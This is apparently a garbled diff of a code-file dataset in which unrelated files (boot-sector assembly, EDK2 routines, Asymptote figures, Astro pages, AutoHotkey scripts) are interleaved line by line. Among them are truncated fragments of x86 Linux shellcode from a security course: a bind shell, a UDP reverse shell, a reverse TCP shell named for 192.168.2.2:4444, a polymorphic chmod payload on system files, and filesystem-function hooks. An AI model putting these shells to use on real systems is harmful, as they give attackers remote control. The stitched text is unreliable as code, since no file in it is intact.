每个扇区（sector）的大小（必须为512字节） - DB 1 ; 簇的大小（必须为1个扇区） - DW 1 ; FAT的起始位置（一般从第一个扇区开始） - DB 2 ; FAT的个数（必须为2） - DW 224 ; 根目录的大小（一般设成224项） - DW 2880 ; 该磁盘的大小（必须是2880扇区） - DB 0xF0 ; 磁盘的种类（必须是0xf0） - DW 9 ; FAT的长度（必须是9扇区） - DW 18 ; 1个磁道（track）有几个扇区（必须是18） - DW 2 ; 磁头数（必须是2） - DD 0 ; 不使用分区（必须是0） - DD 2880 ; 重写一次磁盘大小 - DB 0, 0, 0x29 ; 意义不明，固定 - DD 0xFFFFFFFF ; （可能是）卷标号码 - DB ""HELLO-OS "" ; 磁盘的名称（11字节） - DB ""FAT12 "" ; 磁盘格式名称（8字节） - RESB 18 ; 先空出18字节 - -; 程序主体 - - DB 0xB8, 0x00, 0x00, 0x8E, 0xD0, 0xBC, 0x00, 0x7C - DB 0x8E, 0xD8, 0x8E, 0xC0, 0xBE, 0x74, 0x7C, 0x8A - DB 0x04, 0x83, 0xC6, 0x01, 0x3C, 0x00, 0x74, 0x09 - DB 0xB4, 0x0E, 0xBB, 0x0F,","29","0.006307090039147456","0.0","0.0" -"08da2af1517f5ebb129b90c9a1fc17c12a613297","EnablePaging64.nasm",".nasm","Assembly",";------------------------------------------------------------------------------ -; -; Copyright (c) 2006, Intel Corporation. All rights reserved.
-; This program and the accompanying materials -; are licensed and made available under the terms and conditions of the BSD License -; which accompanies this distribution. The full text of the license may be found at -; http://opensource.org/licenses/bsd-license.php. -; -; THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN ""AS IS"" BASIS, -; WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. -; -; Module Name: -; -; EnablePaging64.Asm -; -; Abstract: -; -; AsmEnablePaging64 function -; -; Notes: -; -;------------------------------------------------------------------------------ - - SECTION .text - -;------------------------------------------------------------------------------ -; VOID -; EFIAPI -; InternalX86EnablePaging64 ( -; IN UINT16 Cs, -; IN UINT64 EntryPoint, -; IN U","28","0.006089604175728578","0.0","0.0" -"06df2028e8ebe586d5e6c78f93943945d873df76","start.nasm",".nasm","Assembly","global _start -extern main - - -bits 32 -align 4 + ORG 0xc200 ; 程序将被装载的地方 -[section .bss] - - -[section .text] +fin: + HLT + JMP fin","31","0.006653788366602275","0.0","0.0" +"0f8a3c281c8313e6350bbd68fc1618120e7bb697","bind_shell.nasm",".nasm","Assembly","; Original Author: Julien Ahrens (@MrTuxracer) +; Addtional review and comments: Matteo Malvica @matteomalvica +; Website: http://www.matteomalvica.com + +global _start + +section .text _start: - call main - - jmp $ -","28","0.006089604175728578","0.0","0.0" -"0d8404560e8758db25411224aa4943ac428a0eb5","FxRestore.nasm",".nasm","Assembly",";------------------------------------------------------------------------------ -; -; Copyright (c) 2006, Intel Corporation. All rights reserved.
-; This program and the accompanying materials -; are licensed and made available under the terms and conditions of the BSD License -; which accompanies this distribution. The full text of the license may be found at -; http://opensource.org/licenses/bsd-license.php. -; -; THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN ""AS IS"" BASIS, -; WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. -; -; Module Name: -; -; FxRestore.Asm -; -; Abstract: -; -; AsmFxRestore function + ; -; Notes: +; int socketcall(int call, unsigned long *args); +; sockfd = socket(int socket_family, int socket_type, int protocol); ; -;------------------------------------------------------------------------------ - - SECTION .text - -;------------------------------------------------------------------------------ -; VOID -; EFIAPI -; InternalX86FxRestore ( -; IN CONST IA32_FX_BUFFER *Buffer -; ); -;----------------------------------------------------------------------------","28","0.006089604175728578","0.0","0.0" -"0dc6e4a0b815f07cdf628690f0b5a3e627d1c428","polymorphic-chmod.nasm",".nasm","Assembly","; -;This code has been created for completing the requirements of the SecurityTube Linux Assembly Expertcertification: -;http://securitytube-­training.com/online-courses/securitytube-linux-assembly-expert/ -;Student ID: SLAE-1537 +push 0x66 +pop eax ;syscall: sys_socketcall + cleanup eax register +push 0x1 ;function call 0x01 for above syscall +pop ebx ;sys_socket (0x1) + cleanup ebx register +xor esi, esi ;cleanup esi register +push esi ;protocol=IPPROTO_IP (0x0) +push ebx ;socket_type=SOCK_STREAM (0x1) still holgind 0x1 +push 0x2 ;socket_family=AF_INET (IPv4 address family) +mov ecx, esp ;save pointer (ESP) to socket() args (ECX) +int 0x80 ;exec SYS_SOCKET + +; int socketcall(int call, unsigned long *args); +; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen); ; +pop edi ; pop 0x2 to edi +xchg edi, eax; save eax result 0x2 (sockfd) for later usage in EDI +xchg ebx, eax ;sys_bind (0x2) +mov a","44","0.0094440867138871","0.0","0.0" +"08277ae18cc261d997615242d7f8297baae6b888",".udprevshell.nasm",".nasm","Assembly","; SLAE-X +; thanks to writesup from previou students :] +; assignment: 2. create a reverse shell +; originality: using UDP instead TCP +; usage : sudo ncat -lup 53 on the receiving end +; warning, this shellcode might contains null byte if you use certain ip / address + + +%define htons(x) ((x >> 8) & 0xFF) | ((x & 0xFF) << 8) +%define _port 5353; +PORT equ htons(_port); + +_ip equ 0x0100007F; loopback 127.0.0.1 test +; warning use non null byte address here +; 127.1.1.1 has issue on UDP fyi + +global _start + +_start: + +; we create a socket fd, using again syscall 0x66 and argument SYS_SOCKET so ebx = 1 +push 0x66 +pop eax +push 0x1 +pop ebx +xor ecx,ecx +push ecx +; but this times it will be a SOCK_DGRAM UDP, so 0x2 as argument +push 0x2 +push 0x2 +mov ecx,esp +int 0x80 +; saving fd + +; then we call connect on this UDP socket (to use send()) +; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); +; we push ip address as argument +push _ip; +xor","44","0.0094440867138871","0.0","0.0" +"0607da4623ca81bcf0cb980d46382554c0d8544c","new.nasm",".nasm","Assembly","; This program reads an Integer from the user and displays it on the screen +; readInput.nasm +; Author: Shubham Kumar -global _start + +global _start section .text -_start: + - xor eax,eax - mov cx,0x1b6 - ;push eax - mov [esp-4], eax +_start: + + mov eax, 0x3 + mov ebx, 0x1 + mov ecx, var1 + mov edx, 0x0a + int 0x80 + + mov eax, 0x4 + mov ebx, 0x1 + mov ecx, var1 + mov edx, 0xa + int 0x80 - ;instead of push dword 0x64777373 - mov dword [esp-8], 0x3B2E9C49 + mov ebx, eax + mov eax, 0x4 + mov ecx, var2 + mov edx, 1024 + + mov eax, 0x1 + mov ebx, 0x4 + int 0x80 - ;instead of push dword 0x61702f2f - mov dword [esp-12], 0x79BDC4E2 +section .data - ;instead of push dword 0x6374652f - mov dword [esp-16], 0x3A2B8E05 + message: db ""Enter a number: "", 0x00 + mlen equ $-message - sub esp, 16 +section .bss + var1 resb 10 + var2 rest 1024 +","44","0.0094440867138871","0.0","0.0" +"0df45a71ccfdc9993f9970cc0674e8a2e8bfa616","test2.nasm",".nasm","Assembly","global_start +section .text - ; BRINGING BACK THE STRING - add [esp+8], dword 0x2948d72a - sub [esp+4], dword 0x184d95b3 - add [esp], dword 0x2948d72a +hook_dosFsOpen: + push ebp + mov ebp,esp + sub esp,xxh - mov ebx,esp - mov al,0xa - add al, 5 - int 0x80 - xor eax,eax - push eax - ;instead of push dword 0x776f6461 - push dword 0x1E36F9E2 - add dword [esp], 0x59386a7f + call __hook_dosFsOpen - ;instead of push dword 0x68732f2f - push dword 0x4F3B8600 - add [esp], dword 0x1937a92f + push xxxxxxh + ret - ;push dword 0x6374652f - push dword 0x3A2B8E05 - add [esp], dword 0x2948d72a +hook_dosFsClose: + push ebp + mov ebp,esp + sub esp,xxh - m","28","0.006089604175728578","0.0","0.0" -"13ade4c1a77c01ed3ee9b6cd06e6c62eeb50d9ef","secuid0_Shell_Reverse_TCP_Shellcode.192.168.2.2-4444.nasm",".nasm","Assembly","; Title: secuid0_Shell_Reverse_TCP_Shellcode -; Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] -; SLAE-461 + call __hook_dosFsClose -global _start + push xxxxxxh + ret -section .text -_start: +hook_dosFsCreate: + push ebp + mov ebp,esp + sub esp,xxh -;socket - xor eax, eax ; zero eax register to hold SYS_socketcall - mov al, 0x66 ; al has enough space to hold the SYS_socketcall syscall id (102d=0x66) (see /usr/include/i386-linux-gnu/asm/unistd_32.h) - ; - xor ebx, ebx ; zero ebx register, ebx will hold the type of socketcall, in this case it will be the SYS_SOCKET - push ebx ; socket 3rd argument - See below at section ""Comment 1"" for explanation - mov bl, 0x1 ; bl has enough space to hold SYS_SOCKET, id 1d = 0x1 (see /usr/include/linux/net.h) - ; - ; From C code: socket_descriptor=socket(AF_INET, SOCK_STREAM, 0); - ; From man pages: int socket(int domain, int type, int protocol) - ; From /usr/include/i386-linux-gnu/bits/socket.h we found that AF_INET""'""s id i","28","0.006089604175728578","0.0","0.0" -"1eb11cf2831c0510eed732d3aeea18f69a3771c1","amc8_102.asy",".asy","Asymptote","settings.outformat=""svg""; -import olympiad; -unitsize(15); + call __hook_dosFsCreate -for (int a = 0; a < 6; ++a){for (int b = 0; b < 6; ++b){dot((4*a,3*b));}}draw((0,0)--(20,0)--(20,15)--(0,15)--cycle);draw((0,0)--(16,12));draw((0,0)--(16,9));label(rotate(30)*""Bjorn"",(12,6.75),SE);label(rotate(37)*""Alberto"",(11,8.25),NW);label(""$0$"",(0,0),S);label(""$1$"",(4,0),S);label(""$2$"",(8,0),S);label(""$3$"",(12,0),S);label(""$4$"",(16,0),S);label(""$5$"",(20,0),S);label(""$0$"",(0,0),W);label(""$15$"",(0,3),W);label(""$30$"",(0,6),W);label(""$45$"",(0,9),W);label(""$60$"",(0,12),W);label(""$75$"",(0,15),W);label(""H"",(6,-2),S);label(""O"",(8,-2),S);label(""U"",(10,-2),S);label(""R"",(12,-2),S);label(""S"",(14,-2),S);label(""M"",(-4,11),N);label(""I"",(-4,9),N);label(""L"",(-4,7),N);label(""E"",(-4,5),N);label(""S"",(-4,3),N);","41","0.82","0.0","0.0" -"05b4e7662cf83211deaa417453db9cb6ffc597b5","spectrum.asy",".asy","Asymptote","import graph; -usepackage(""ocg""); -settings.tex=""pdflatex""; - -// Dan Bruton algorithm -pen nm2rgb(real wl, real gamma=0.8, bool intensity=true) { - triple rgb; - if(wl >= 380 && wl <= 440) {rgb=((440-wl)/60,0,1);} - if(wl > 440 && wl <= 490) {rgb=(0,(wl-440)/50,1);} - if(wl > 490 && wl <= 510) {rgb=(0,1,(510-wl)/20);} - if(wl > 510 && wl <= 580) {rgb=((wl-510)/70,1,0);} - if(wl > 580 && wl <= 645) {rgb=(1,(645-wl)/65,0);} - if(wl > 645 && wl <= 780) {rgb=(1,0,0);} - - real Intensity=1; - if(intensity) { - if(wl >= 700) {Intensity=0.3+0.7*(780-wl)/80;} - else if(wl <= 420) {Intensity=0.3+0.7*(wl-380)/40;} - } + push xxxxxxh + ret - return rgb((Intensity*rgb.x)**gamma,(Intensity*rgb.y)**gamma, - (Intensity*rgb.z)**gamma); -} -real width=1; -real height=50; +hook_dosFsDelete: + push ebp + mov ebp,esp + sub esp,xxh -begin(""spectrum""); -for(real i=380 ; i <= 780 ; i += width) { - draw((i,0)--(i,height),width+nm2rgb(wl=i,false)+squarecap); -} -begin(""Extinction"",false); // nested -for(real i=380 ; i <= 780 ; i += width) { - draw((i,0)--(i,height),width+nm2rgb","41","0.82","0.0","0.0" -"000f42ad9845f7bf32937fd4c4ff8428921088a4","figpartial4a_3D.asy",".asy","Asymptote","include apexconfig; + call __hook_dosFsDelete -//ASY file for fig:partial4 in Chapter 12 sec:multi_tangent + push xxxxxxh + ret -size(200,200,IgnoreAspect); -//size(200,200,Aspect); -//currentprojection=perspective(7,2,1); -currentprojection=orthographic(4,4,2); -// setup and draw the axes -real[] myxchoice={2,4}; -real[] myychoice={2,4}; -real[] myzchoice={-1,1}; +hook_dosFsRead: + push ebp + mov ebp,esp + sub esp,xxh -pair xbounds=(-0.5,5); -pair ybounds=(-0.5,4.5); -pair zbounds=(-1.5,1.5); + call __hook_dosFsRead -xaxis3("""",xbounds.x,xbounds.y,black,OutTicks(myxchoice),Arrow3(size=3mm)); -yaxis3("""",ybounds.x,ybounds.y,black,OutTicks(myychoice),Arrow3(size=3mm)); -zaxis3("""",zbounds.x,zbounds.y,black,OutTicks(myzchoice),Arrow3(size=3mm)); + push xxxxxxh + ret -label(""$x$"",(xbounds.y+0.05*(xbounds.y-xbounds.x),0,0)); -label(""$y$"",(0,ybounds.y+0.05*(ybounds.y-ybounds.x),0)); -label(""$z$"",(0,0,zbounds.y+0.05*(zbounds.y-zbounds.x))); -triple f(pair t) { - return (t.x,t.y,sin(t.x)*cos(t.y)); -} -surface s=surface(f,(-1,-1),(4,4),16,16,Spline); -draw(s,emissive(coloronefill),meshpen=colorone); +hook_dosFsWrite: + push ebp + mov ebp,esp + sub esp,xxh -//plot point on surface -dotfactor=3; -dot((pi/2,pi/2,0))","41","0.82","0.0","0.0" -"0976c9c7bf26c82652e17bcbf8cfd00c8a9c20f0","solution.asy",".asy","Asymptote","import geometry; + call __hook_dosFsWrite -// access /_style/jeolm/ as jeolm.asy -access jeolm; + push xxxxxxh + ret -// access /common-sizes/ as common-sizes.asy -access ""common-sizes.asy"" as sizes; -size(sizes.size); -var mr = sizes.markradius; +read_ebp: + push ebp + mov ebp,esp + mov eax,ebp + mov esp,ebp + pop ebp + ret + lea esi,[esi+0x0] -var - A = (0,0), BC = parallel((1,0), (0,1)), - B = intersectionpoint(BC, parallel(A, dir(-20))), - C = intersectionpoint(BC, parallel(A, dir(20))), - ABC = triangle(A, B, C), +pathcmp: + push ebp + mov ebp,esp + sub esp,0xc + push edi + xor edi,edi + push esi + mov esi,DWORD[ebp+0xc] + push ebx + mov ebx,DWORD[ebp+0x8] + sub esp,0xc + ","44","0.0094440867138871","0.0","0.0" +"0a1bf41a3db9492022b717d3b85b0a5fd55fefc6","multiboot.nasm",".nasm","Assembly","; +; Copyright (c) 2020 Bitdefender +; SPDX-License-Identifier: Apache-2.0 +; - S = intersectionpoint(ABC.AB, parallel(C, unit(B-C) / dir(10))), - T = intersectionpoint(ABC.BC, parallel(A, unit(B-A) * dir(10))), +%ifndef _MULTIBOOT_YASM_ +%define _MULTIBOOT_YASM_ +%include ""struct.nasm"" +%include ""macros.nasm"" + +%ifdef DOC_FILE + multiboot.nasm - contains the definition for the MULTIBOOT_INFO structure and related data types. + Used during system boot. +%endif + +_struc MULTIBOOT_HEADER + dword (magic) + dword (flags) + dword (checksum) + dword (header_addr) + dword (load_addr) + dword (load_end_addr) + dword (bss_end_addr) + dword (entry_addr) + dword (mode_type) + dword (width) + dword (height) + dword (depth) +_endstruc + + +MULTIBOOT_HEADER_SIZE equ 48 ; check out '3.1.1 The layout of Multiboot header' +MULTIBOOT_HEADER_MAGIC equ 0x1BADB002 +MULT","44","0.0094440867138871","0.0","0.0" +"0f153b12acd6e660fecf4d814517692c0aa09362","headnote.astro",".astro","Astro"," - P = extension(A, T, C, S); +
+ This résumé is generated from a live website. + You can find it at cv.stevensinatra.id +
+","11","1.2222222222222223","0.0","0.0" +"013539eb56e915a2e66171f9493bcf5c77f2cabb","HeaderLink.astro",".astro","Astro","--- +export interface Props extends astroHTML.JSX.AnchorHTMLAttributes {} -draw(ABC, linewidth(1)); -draw(A--T); -draw(C--S); -draw(S--T); +const { href, class: className, ...props } = Astro.props; +const isActive = href === Astro.url.pathname; +--- -markangle(A, C, B, radius=0.7mr, n=1); -markangle(C, B, A, radius=0.5mr, n=1); -markangle(B, S, T, radius=0.5mr, n=1); + + + + +","11","1.2222222222222223","0.0","0.0" +"11028872aa14f5d9cb2f63a0121c3e81afcd56ef","art_post.astro",".astro","Astro","--- +import MainHead from '../components/MainHead.astro'; +import Footer from '../components/Footer/index.jsx'; +import Nav from '../components/Nav/index.jsx'; -markangle(S, T, B, radius=0.8mr, n=2); -markangle(B, A, C, radius=0.9mr, n=2); +const { content } = Astro.props; +--- -markangle(B, A, T, radius=1.4mr, n=3); -markangle(S, C, B, radius=1.3mr, n=3); + + + + +
+

Programming Languages

+

+ JavaScript (ESNext), TypeScript / Flow, HTML, CSS/SASS, GraphQL, PHP, Ruby +

-// setup and draw the axes -real[] myxchoice={-1,1}; -real[] myychoice={-1,1}; -real[] myzchoice={-1,1}; -defaultpen(0.5mm); -pair xbounds=(-1.5,1.5); -pair ybounds=(-1.5,1.5); -pair zbounds=(-1.5,1.5); +

Framework / Libraries

+

React, Material UI, Gatsby, Jekyll, Node.js, Storybook

-xaxis3("""",xbounds.x,xbounds.y,black,OutTicks(myxchoice),Arrow3(size=3mm)); -yaxis3("""",ybounds.x,ybounds.y,black,OutTicks(myychoice),Arrow3(size=3mm)); -zaxis3("""",zbounds.x,zbounds.y,black,OutTicks(myzchoice),Arrow3(size=3mm)); +

Tools / Platforms

+

Git, Webpack, Babel, AWS, Docker, ESLint, Jest

+
+","11","1.2222222222222223","0.0","0.0" +"088f47b9d8465ad6eb0d9216ef6cebfb6e55bb39","BooksList.astro",".astro","Astro","--- +const books = await Astro.glob('../../pages/book/*.md'); +const publishedBooks = books.filter(book => (book.frontmatter.draft != true)).filter(book => (book.frontmatter.editions != null)) -label(""$x$"",(xbounds.y+0.05*(xbounds.y-xbounds.x),0,0)); -label(""$y$"",(0,ybounds.y+0.05*(ybounds.y-ybounds.x),0)); -label(""$z$"",(0,0,zbounds.y+0.05*(zbounds.y-zbounds.x))); +const sortedBooks = publishedBooks.sort( + (a, b) => new Date(b.frontmatter.date) - new Date(a.frontmatter.date) +); +--- +","11","1.2222222222222223","0.0","0.0" +"11c4ddec5b7e53d2aec304b133f1b5b006916c16","amc12_12.asy",".asy","Asymptote","settings.outformat=""svg""; +import olympiad; +unitsize(15); -//Draw the surface z^2 = y^2 - x^2 -//triple f(pair t) { -// return (t.x,t.y,-(t.x)^2+(t.y)^2);// -//} -//surface s=surface(f,(-1,-1),(1,1),32,16,Spline); -//pen p=rgb(0,0,.7); -//draw(s,rgb(.6,.6,1)+opacity(.7),m","41","0.82","0.0","0.0" -"04c4ef1db764d63f69706373c34d97c137739bd1","Log into Both Systems.ahk",".ahk","AutoHotkey","; Set up settings before continuing -CoordMode, Mouse, Screen - -; Log into first system -Run ""C:\Users\reservations\My Documents\ahk\AutoHotkeyA32.exe"" ""Log In.ahk"" %1% %3% -Sleep, 80000 - -; Log into second system -Send, ^t ; Open a new tab -Sleep, 10000 -MouseMove, 830, 422 -MouseClick -Send, {BackSpace 2} ; Append last two characters to select correct system -Sleep, 50 -Send, %2% -Sleep, 50 -MouseMove 830, 508 -MouseClick -Send, {BackSpace 3} ; Append last three characters to be able to type in correct username -Sleep, 50 -Send, RR -Sleep, 50 -MouseMove, 1160, 594 -MouseClick -Send, {BackSpace 11} ; Remove the current password, in case it was autofilled -Sleep, 50 -Send, %3% -Sleep, 50 -MouseMove, 960, 740 ; Click on the log in button -MouseClick -Sleep, 10000 ; I've finally logged in -Send, ^1 ; Swap back to CLI tab. I'm done! - - - -ExitApp -Esc::ExitApp","319","1.1352313167259787","0.0","0.0" -"21c54ef9a1f89a7a3ff01c38461046b6e3b38edd","Sega Hikaru.ahk",".ahk","AutoHotkey","# Emulator: Demul -# By StevenB - stevenbreuls.com -# Downloaded from: https://github.com/stevenb9/Hyperspin-AHK-Modules - -RunWait, %executable% -run=hikaru -rom=""%romName%"", %emuPath% - -Process, WaitClose, %Executable% - -ExitApp - -CloseProcess: - Process, Close, %Executable% -return ","319","1.1352313167259787","0.0","0.0" -"18b42ccd2b420dc8671ae92441d525c2becc7c44","History GUI Plug.ahk",".ahk","AutoHotkey",";History Gui labels and functions -;A lot Thanks to chaz - -gui_History() -; Creates and shows a GUI for managing and viewing the clipboard history -{ - global - static x, y, how_sort := 2_sort := 3_sort := 0, what_sort := 2 - local selected_row - ;2_3_sort are the vars storing how cols are sorted , 1 means in Sort ; 0 means SortDesc - - Gui, History:new - Gui, Margin, 7, 7 - Gui, +Resize +MinSize390x110 - - Iniread, history_w, % CONFIGURATION_FILE, Clipboard_History_window, w, %A_Space% - Iniread, h, % CONFIGURATION_FILE, Clipboard_History_window, h, %A_Space% - - Gui, Add, Button, w75 h23 Section Default vhistory_ButtonPreview ghistory_ButtonPreview, &Preview - Gui, Add, Button, x+6 ys w75 h23 vhistory_ButtonDelete ghistory_ButtonDelete, Dele&te item - Gui, Add, Button, x+6 ys w75 h23 vhistory_ButtonDeleteAll ghistory_ButtonDeleteAll, Clear &history - Gui, Add, Text, x+15 ys+5 vhistory_SearchText, Search &Filter: - Gui, Add, Checkbox, x+10 ys+5 w65 Checked%history_partial% ","319","1.1352313167259787","0.0","0.0" -"13a8b03d8bcd4d9ee09653522b49e96544cf24d3","AccWrapper.ahk",".ahk","AutoHotkey"," -/* -说明:主要是对Acc-ComObj进行分析 -*/ -Class AccWrapper{ - p_accObj := """",path := AccWrapper.unknown - ;------------------------------ - Static loaded := """",setting := 0,unknown := ""UnKnown"" - ;sources: WinUser.h, oleacc.h - ;e.g. STATE_SYSTEM_SELECTED := 0x2 - static State := {0x1:""UNAVAILABLE"" - , 0x2:""SELECTED"" - , 0x4:""FOCUSED"" - , 0x8:""PRESSED"" - , 0x10:""CHECKED"" - , 0x20:""MIXED"" - , 0x40:""READONLY"" - , 0x80:""HOTTRACKED"" - , 0x100:""DEFAULT"" - , 0x200:""EXPANDED"" - , 0x400:""COLLAPSED"" - , 0x800:""BUSY"" - , 0x1000:""FLOATING"" - , 0x2000:""MARQUEED"" - , 0x4000:""ANIMATED"" - , 0x8000:""INVISIBLE"" - , 0x10000:""OFFSCREEN"" - , 0x20000:""SIZEABLE"" - , 0x40000:""MOVEABLE"" - , 0x80000:""SELFVOICING"" - , 0x100000:""FOCUSABLE"" - , 0x200000:""SELECTABLE"" - , 0x400000:""LINKED"" - , 0x800000:""TRAVERSED"" - , 0x1000000:""MULTISELECTABLE"" - , 0x2000000:""EXTSELECTABLE"" - , 0x4000000:""ALERT_LOW"" - , 0x8000000:""ALERT_MEDIUM"" - , 0x10000000:""ALERT_HIGH"" - , 0x20000000:""PROTECTED"" - , 0x40000000:""HASPOPUP""} - ;------------------------------ - get(p*){ - return t","319","1.1352313167259787","0.0","0.0" -"0ebae1c2ad79084c4c1d1879cd7cc711cec47969","IC_BrivGemFarm_Component.ahk",".ahk","AutoHotkey","#include %A_LineFile%\..\IC_BrivGemFarm_Functions.ahk -class IC_BrivGemFarm_Potato_Component -{ - InjectAddon() +//Choice Asize(100);defaultpen(linewidth(0.7)+fontsize(8));real end=4.5;draw((-end,0)--(end,0), EndArrow(5));draw((0,-end)--(0,end), EndArrow(5));real ticks=0.2, four=3.7, r=0.1;draw((1,ticks)--(1,-ticks)^^(-1,ticks)--(-1,-ticks)^^(four,ticks)--(four,-ticks)^^(-four,ticks)--(-four,-ticks));label(""$x$"", (4,0), N);label(""$y$"", (0,4), W);label(""$-4$"", (-4,-ticks), S);label(""$-1$"", (-1,-ticks), S);label(""$1$"", (1,-ticks), S);label(""$4$"", (4,-ticks), S);real f(real x) {return 0.101562 x^4+0.265625 x^3+0.0546875 x^2-0.109375 x+0.125;}real g(real x) {return 0.0625 x^4+0.0520833 x^3-0.21875 x^2-0.145833 x-2.5;}draw(graph(f,-four, four), heavygray);draw(graph(g,-four, four), black);clip((-end-r,-end-r)--(-end-r, end+r)--(end+r,end+r)--(end+r, -end-r)--cycle);label(""$\textbf{(A)}$"", (-5,4.5));","47","1.146341463414634","0.0","0.0" +"061eeb76a4402aa329277764e2d01090877c3eef","recplot.asy",".asy","Asymptote","// 使用自适应方法产生 y = f(x) 的图象 guide +guide plot(real f(real), real min, real max, int nplotpoints=10, int maxrec=7) +{ + if (nplotpoints < 2) + nplotpoints = 2; + // 描初始的 nplotpoints 个点，并估计函数变化幅度 + pair[] fpoints; + real fmax = -infinity, fmin = infinity; + for (int i = 0; i <= nplotpoints; ++i) { + real x = min + i/nplotpoints * (max-min); + pair z = (x, f(x)); + fmax = max(fmax, z.y); + fmin = min(fmin, z.y); + fpoints.push(z); + } + // 定义辅助的递归函数：在规定的递归次数之内，在两个样本点之间描新点 + // 误差 fuzz 达到函数变化幅度估计值的 1/500 为止 + // 这个误差值在一般屏幕显示上只有一两个像素 + real fuzz = max(0.002(fmax-fmin), realEpsilon); + guide helper(int nrec, pair a, pair b) { - splitStr := StrSplit(A_LineFile, ""\"") - addonDirLoc := splitStr[(splitStr.Count()-1)] - addonLoc := ""#include *i %A_LineFile%\..\..\"" . addonDirLoc . ""\IC_BrivGemFarm_Addon.ahk`n"" - FileAppend, %addonLoc%, %g_BrivFarmModLoc% + if (nrec == 0) + return b; + pair mid = (a+b)/2; + pair z = (mid.x, f(mid.x)); + if (abs(z.y-mid.y) < fuzz) + return z -- b; + else + return helper(nrec-1, a, z) -- helper(nrec-1, z, b); } -} -IC_BrivGemFarm_Potato_Component.InjectAddon()","319","1.1352313167259787","0.0","0.0" -"06f8b368e87087bec4b828ff51f1bf2ccf5c99cd","Example 19 - OscillatorValue.au3",".au3","AutoIt","#AutoIt3Wrapper_Run_AU3Check=n -#include ""..\MoGraphics.au3"" - -_AutoItObject_Startup() -_GDIPlus_Startup() - -$hGUI = GUICreate(""Example 19 - OscillatorValue"", 400, 400) -GUISetState() - -$hGpx = _GDIPlus_GraphicsCreateFromHWND($hGUI) - -$oScene = _MoGraph_SceneCreate() - -$oEllipse = _MoGraph_ShapeCreateEllipse(_MoGraph_OscillatorValueCreate(0.03, 180, 0, 190), _MoGraph_OscillatorValueCreate(0.08, 180, ACos(-1)/2, 190), 20, 20) -_MoGraph_SceneAddObject($oScene, $oEllipse) - -$oSettings = _MoGraph_GraphicsRendererCreateSettings($hGpx, 400, 400, 0xFFFFFFFF) -$oRenderer = _MoGraph_GraphicsRendererCreate($oScene, $oSettings) - -While 1 - _MoGraph_RendererRenderFrameNext($oRenderer) + // 递归构造 guide + guide g = fpoints[0]; + for (int i = 0; i < nplotpoints; ++i) + g = g -- helper(maxrec, fpoints[i], fpoints[i+1]); + return g; +} + + + +","47","1.146341463414634","0.0","0.0" +"1115b32a96640694575980ea3ae012d83dedb5ea","skeleton_base.asy",".asy","Asymptote","include ""skeleton_common.asy""; + +real soff = 0.5; +point dd = d + mov(d, e, ddir, soff); +point ee = e + mov(e, f, edir, soff); +point ff = f + mov(f, g, fdir, soff); +point gg = g + mov(g, h, gdir, soff); +point hh = h + mov(h, a, hdir, soff); +point aa = a + mov(a, b, adir, soff); +point bb = b + mov(b, c, bdir, soff); +point cc = c + mov(c, d, cdir, soff); +real soff0 = 1; +point dd0 = d + mov(d, e, ddir, soff0); +point ee0 = e + mov(e, f, edir, soff0); +point ff0 = f + mov(f, g, fdir, soff0); +point gg0 = g + mov(g, h, gdir, soff0); +point hh0 = h + mov(h, a, hdir, soff0); +point aa0 = a + mov(a, b, adir, soff0); +point bb0 = b + mov(b, c, bdir, soff0); +point cc0 = c + mov(c, d, cdir, soff0); + +path coast0 = aa--bb--cc--dd--ee--ff--gg--hh--cycle; +path coast1 = aa0--bb0--cc0--dd0--ee0--ff0--gg0--hh0--cycle; + +draw(coast0, green, EndArrow(5, position=0.8)); +draw(coast1, cyan, EndArrow(5, position=0.8)); +draw(a--((a + oa) * 0.5), blue + linewidth(1.2)); +draw(coastline, solid+linewidth(1.2)+red); +label(""","47","1.146341463414634","0.0","0.0" +"0a0ab99f367801b3f55a35a0f812e762132dc17d","tm-b4.asy",".asy","Asymptote","include ""pictures/segment.asy""; +include ""pictures/trapezoid.asy""; + +unitsize(0.6cm, 0.3cm); + +draw(segs[0]); +draw(segs[1]); +draw(segs[2]); + +draw_vcomplement_pos_inf(segs[0].l); +draw_vcomplement_pos_neg(segs[0].l); +draw_vcomplement_pos_neg(segs[0].r); +draw_vcomplement_pos_inf(segs[1].l); +draw_vcomplement_pos_inf(segs[1].r); +draw_vcomplement_pos_neg(segs[1].r); +draw_vcomplement_pos_inf(segs[2].r); +draw_vcomplement_pos_neg(segs[2].r); + +draw_vcomplement(segs[0].r, segs[1]); +draw_vcomplement(segs[1].l, segs[0]); + +draw(segs[3].l--segs[3].r, dashed); + +label_seg(0, SE, 0.4); +label_seg(1, N); +label_seg(2, SE); +label_seg(3, S); + +label_trapezoid((2, 5), 0, 1); +label_trapezoid((6.0, 0), 1, 1); +label_trapezoid((4.2, 9), 2, 2); +label_trapezoid((6.5, 7), 3, 2); +label_trapezoid((7.7, 12), 4, 2); +label_trapezoid((9.3, 0.5), 5, 2); +label_trapezoid((11.4, 4), 6, 3); +label_trapezoid((11.4, 12), 7, 3); +label_trapezoid((12.55, 5), 8, 3); + +dot((14.5, 15), invisible); + +","47","1.146341463414634","0.0","0.0" +"03a37178d8891cd587720d8f07986bbedcecf644","isect-1-b.asy",".asy","Asymptote","unitsize(0.5inch); + +pair p = (4,5); +dot(p); +label(""$p$"", p, W); +pair r = (13,4); + +pair v = p * 0.6 + r * 0.4; +pair prev = v + (-2, 2); +pair next = v + (3, -1); + +dot(prev); +label(""$v_{i-1}$"", prev, W); +dot(v); +label(""$v_{i}$"", v, S); +dot(next); +label(""$v_{i+1}$"", next, SE); + +draw(prev--v--next); +draw(p--r, gray); +","47","1.146341463414634","0.0","0.0" +"006f47c618739acf61c084ec52ef2dbae1387fe0","List.ahk",".ahk","AutoHotkey","FileSelectFolder, Folder +FileList = ; 初始化为空。 +Loop, %Folder%\*.jpg, , 1 ; 在子文件夹中搜索。 +FileList = %FileList%%A_LoopFileName%`n +Sort, FileList, StringSort +StringSort(a1, a2) +{ + if(StrLen(a1)>strlen(a2)) + + return a1 > a2 ? 1 : a1 < a2 ? -1 : 0 +} + +Loop, parse, FileList, `n +{ + if 